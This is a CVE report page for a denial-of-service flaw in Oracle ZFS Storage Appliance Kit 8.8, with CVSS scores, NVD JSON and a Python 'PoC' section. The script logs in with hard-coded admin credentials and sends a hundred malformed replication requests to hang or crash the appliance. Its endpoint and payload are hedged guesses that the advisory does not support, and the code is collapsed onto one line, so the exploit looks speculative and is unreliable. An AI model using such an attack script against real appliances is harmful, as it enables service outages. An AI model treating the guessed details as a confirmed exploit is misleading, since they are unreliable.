Security Vulnerability Report
中文
CVE-2025-62477 CVSS 4.9 MEDIUM

CVE-2025-62477

Published: 2025-10-21 20:20:54
Last Modified: 2025-10-23 16:02:49
Source: [email protected]

Description

Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Remote Replication). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:* - VULNERABLE
Oracle ZFS Storage Appliance Kit 8.8

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62477 - Oracle ZFS Storage Appliance Kit Remote Replication DoS PoC # This PoC demonstrates a Denial of Service attack against the Remote Replication component # Note: Requires high-privileged credentials (PR:H) to exploit import requests import sys import time # Target configuration TARGET_HOST = "https://target-zfs-appliance:215" USERNAME = "admin" # High-privileged account required PASSWORD = "password123" # Remote Replication API endpoint REPLICATION_ENDPOINT = f"{TARGET_HOST}/api/remote-replication/v1/actions" def authenticate(session, username, password): """Authenticate to the Oracle ZFS Storage Appliance Kit""" login_url = f"{TARGET_HOST}/api/access/v1/tokens" payload = { "username": username, "password": password } headers = { "Content-Type": "application/json" } try: response = session.post(login_url, json=payload, headers=headers, verify=False) if response.status_code == 200 or response.status_code == 201: token = response.json().get("token", "") return token except Exception as e: print(f"[-] Authentication failed: {e}") return None def trigger_dos(session, token): """Trigger the DoS vulnerability in Remote Replication component""" headers = { "Authorization": f"Bearer {token}", "Content-Type": "application/json" } # Malformed payload designed to trigger the vulnerability # Sending excessive replication action requests to cause system hang/crash payload = { "action": "replicate", "source": "project1/share1", "target": "project2/share2", "properties": { "bandwidth_limit": "0", # Zero bandwidth limit may cause resource exhaustion "retention": "-1", # Invalid retention value "compression": "invalid", "max_snapshots": 999999999 # Excessive snapshot count } } print("[*] Sending malicious replication request...") for i in range(100): try: response = session.post( REPLICATION_ENDPOINT, json=payload, headers=headers, verify=False, timeout=5 ) print(f"[*] Request {i+1}: Status {response.status_code}") except requests.exceptions.Timeout: print(f"[*] Request {i+1}: Timeout (possible DoS triggered)") except Exception as e: print(f"[*] Request {i+1}: Error - {e}") print("[*] DoS attack completed. Target system may be in hung/crashed state.") def main(): session = requests.Session() print(f"[*] Target: {TARGET_HOST}") print(f"[*] CVE-2025-62477 - Oracle ZFS Storage Appliance Kit DoS PoC") # Step 1: Authenticate print("[*] Authenticating...") token = authenticate(session, USERNAME, PASSWORD) if not token: print("[-] Failed to obtain authentication token") sys.exit(1) print("[+] Authentication successful") # Step 2: Trigger the vulnerability trigger_dos(session, token) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62477", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:54.363", "lastModified": "2025-10-23T16:02:49.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: Remote Replication). The supported version that is affected is 8.8. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle ZFS Storage Appliance Kit. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle ZFS Storage Appliance Kit. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:zfs_storage_appliance_kit:8.8:*:*:*:*:*:*:*", "matchCriteriaId": "D3E503FB-6279-4D4A-91D8-E237ECF9D2B0"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.